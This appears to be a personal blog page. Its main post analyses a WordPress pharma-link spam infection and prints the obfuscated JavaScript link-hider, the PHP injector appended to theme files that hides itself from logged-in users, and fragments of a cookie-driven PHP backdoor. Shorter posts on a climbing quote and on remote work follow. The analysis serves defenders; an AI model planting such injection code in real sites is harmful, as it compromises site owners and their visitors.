September 17, 2013

WordPress Black Hat SEO dissected

Posted in Software at 21:00 by graham

Last weekend a friend asked me why there were pharma links hidden in her GoDaddy hosted WordPress site, and that led me into the WordPress black hat SEO rabbit hole.

Front end

This is what we were seeing:


From a browser the site looked fine. The links had been there undetected for five months! The HTML is being hidden by this CSS:

<style type="text/css">.blogcycle_p{position:absolute;clip:rect(438px,auto,auto,438px);}</style>

But that CSS doesn’t appear anywhere on the page. It’s being written out by this obfuscated Javascript:

var _gw7 = [];
_gw7.push(['_trackPageview', '1301851861911781711021861911821711311041861711901861171']);
_gw7.push(['_setOption', '6918518510413211616817818117316919116917817116518219318']);
_gw7.push(['_trackPageview', '2181185175186175181180128167168185181178187186171129169']);
_gw7.push(['_setOption', '1781751821281841711691861101221211261821901141671871861']);
_gw7.push(['_trackPageview', '8111416718718618111412212112618219011112919513011718518']);
_gw7.push(['_setOption', '6191178171132']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw7.length; v++) t += _gw7[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);

Presumably this is being done so that Google doesn’t notice that the links are not visible. The number in the _gw7 variable name varies – maybe it’s random or maybe a version number. You can find many other victims by searching for 13018518….

Back end – display

The big question then became: How the hell is this getting onto the page?

The answer is the PHP has been edited. The functions.php in every single theme had this appended to the bottom (scroll all the way to the right for the important part):

if (!function_exists("b_call")) {
function b_call() {
if (!ob_get_level()) ob_start("b_goes");
function b_goes($p) {
if (!defined('wp_m1')) {
    if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in()) || (!$m = get_option('_iconfeed1'))) {
        return $p;
    list($m, $n) = @unserialize(trim(strrev($m)));
    define('wp_m1', $m);
    define('wp_n1', $n);
if (!stripos($p, wp_n1)) $p = preg_replace("~<body[^>]*>~i", "$0\n".wp_n1, $p, 1);
if (!stripos($p, wp_m1)) $p = preg_replace("~</head>~", wp_m1."\n</head>", $p, 1);
if (!stripos($p, wp_n1)) $p = preg_replace("~</div>~", "</div>\n".wp_n1, $p, 1);
if (!stripos($p, wp_m1)) $p = preg_replace("~</div>~", wp_m1."\n</div>", $p, 1);
return $p;
function b_end() {
if (ob_get_level()) ob_end_clean();
add_action("init", "b_call");
add_action("wp_head", "b_call");
add_action("get_sidebar", "b_call");
add_action("wp_footer", "b_call");
add_action("shutdown", "b_end");

My knowledge of WordPress is basic, so the first few times I looked at this it seemed fine. It was only thanks to an analysis by NinjaFirewall that I went and looked again. The get_option('_iconfeed1') is reading from the database, reversing the value, and injecting it into the page. The name of the option changes, presumably it’s picked from a list at infection time. There’s a nice touch here where it doesn’t show to logged in users, which probably complicates investigation (“My site looks fine, your computer must have a virus or something!”).

In the wp_options database table that _iconfeed1 contains the Javascript and HTML string with all the pharma links, reversed. Why is it reversed? I’m not sure. Maybe it defeats some wordpress plugins that look for this type of thing. It certainly defeated my initial grep of the database dump.

Back end – input

But wait, it’s about to get so much better, because the next question is how the hell did they write to wp_options. An svn diff of the wordpress install against the repo reveals these new files:

  • wp-content//entry-nav.php # In several, but not all, themes
  • wp-content//sidebar-meta.php # Only in one theme
  • wp-admin/ms-media.php
  • wp-admin/includes/class-wp-menu.php
  • wp-includes/theme-compat/archive.php
  • wp-includes/post-load.php

The names differ on other infected sites, but seem chosen to look like parts of WordPress. And what’s in those file? Oh, you’re in for a treat – here’s the first few lines of one:

$bawdy= 'T';
$concoct = 'e';$cretin= '2XRa)$r)';$eyers= ';$_';

$befogged= 'e'; $gayety ='a';$jolynn ='8'; $armour ='$0QP('; $hotdick ='K';$brief='a)Q$TM';$boxtop = 'e'; $grating='i'; $fuckyoufuckyou ='s';$claus='P';
$blitzes = '$[n>EO_';$cancels = 'N(gL';$fernanda= 'cV;E;r)6';$hasty =':i_e_';

$carla = '$(Wa'; $duplicable=',2aC(';
$dolli = 't'; $contributing='$';

They all follow the same pattern, with variables names clearly taken from a word list. Most of them didn’t seem to run, they were missing variable and a closing php tag. For analysis, here’s a full one (minus php tag) that did run, and that I’ve hacked around to display it’s output: obfuscated php (To understand it look for ‘hello’).

It decodes to this:

    ? $i["b02005f9ffdf8"]:

That takes base64 encoded PHP code in either a URL parameter or a cookie, and runs it. The cookie part is nice, because it won’t show in the access logs. The hex string is a nice touch too. It changes for each infection, so other people will have a hard time taking advantage of the back door.

To run echo "<h1>Hello</h1>"; the attacker would hit something like:

Who did it? How?

Who did it? In the apache access logs the only hit I see on one of those injection scripts is from a hosting provider in Germany that does VPS and dedicated hosting. One single hit, and because it has a cookie I don’t have the PHP that they ran. Around that time I see a ton of probing from an address in Israel, a little suspicious given that the site is a local Canadian business, but it’s certainly not conclusive. I have no idea who did it.

How? I’m not sure. There were only two accounts on that site, with what I’d consider good passwords. Like every WordPress site it was getting lots of brute force cracking attempts, but POSTing to the login page gets you about 2 attempts / second (my sites use BruteProtect to reduce this). My leading theory then is that the attackers got into a different site on the shared hosting, and just wrote into every other site on that machine (which are just different directories it seems).

How did I fix it? I moved my friend off GoDaddy’s shared hosting, to my own wordpress multi-site on a Linode server.

The crazy part is that the sole purpose of the attack is to raise the page rank of some pharma links. I didn’t realise SEO was such big business that people would go to all this work.

I am also quite in admiration of the poor programmer who had to build this. Imagine trying to debug the CSS that was output by your reversed obfuscated Javascript, which was written into the database by base 64 encoding it and feeding it to an obfuscated PHP script! I tip my hat to you, Mr Back Hat SEO programmer.

Here are some other people who have the same problem but with different variables. And here’s what seems to be an earlier variant of this attack.

If you have any more information about his, please let me know in the comments, and I’ll update the post. Thanks!

September 11, 2013

Quote: Look well to each step

Posted in Misc at 03:08 by graham

From the epilogue of Jon Krakauer’s “Into the Wild”:

Still, the last sad memory hovers round, and sometimes drifts across like floating mist, cutting off sunshine and chilling the remembrance of happier times.

There have been joys too great to be described in words, and there have been griefs upon which I have not dared to dwell; and with these in mind I say: Climb if you will, but remember that courage and strength are nought without prudence, and that a momentary negligence may destroy the happiness of a lifetime.

Do nothing in haste; look well to each step; and from the beginning think what may be the end

Edward Whymper, Scrambles Amongst the Alps

One of my favorite quotes.

September 2, 2013

What if everyone worked remotely?

Posted in Behaviour at 16:49 by graham

What would happen if everyone had the freedom to work remotely? How would things change?

Many companies such as Lincoln Loop, Mozilla, Automattic, and MySQL AB are already distributed organizations. Central to that philosophy is that only what you do matters, not where or when. Obviously some work, like fishing and truck driving, can’t be done remotely, but in modern economies, a large number of people spend the bulk of their day sitting at a desk. What if they all felt free to work remotely? It’s a fun though experiment, so here goes – what changes might we see?

Less commuting. Commuting, for most people, is a reliable and persistent source of unhappiness (because it reduces the control you have over your own life). Less commuting also means less car miles driven, which means less death on the road. Less commuting means less pollution and lower demand for oil, with attendant geo-political consequences.

More community. Instead of just sleeping in our homes, we now live there, and become part of the community, indeed we create that community. You can pick up your kids from school at 4pm. You can attend the town hall meeting. You’re supporting the businesses near you. You actually meet and talk to your neighbours. You move somewhere where you like your neighbours :-)

Read the rest of this entry »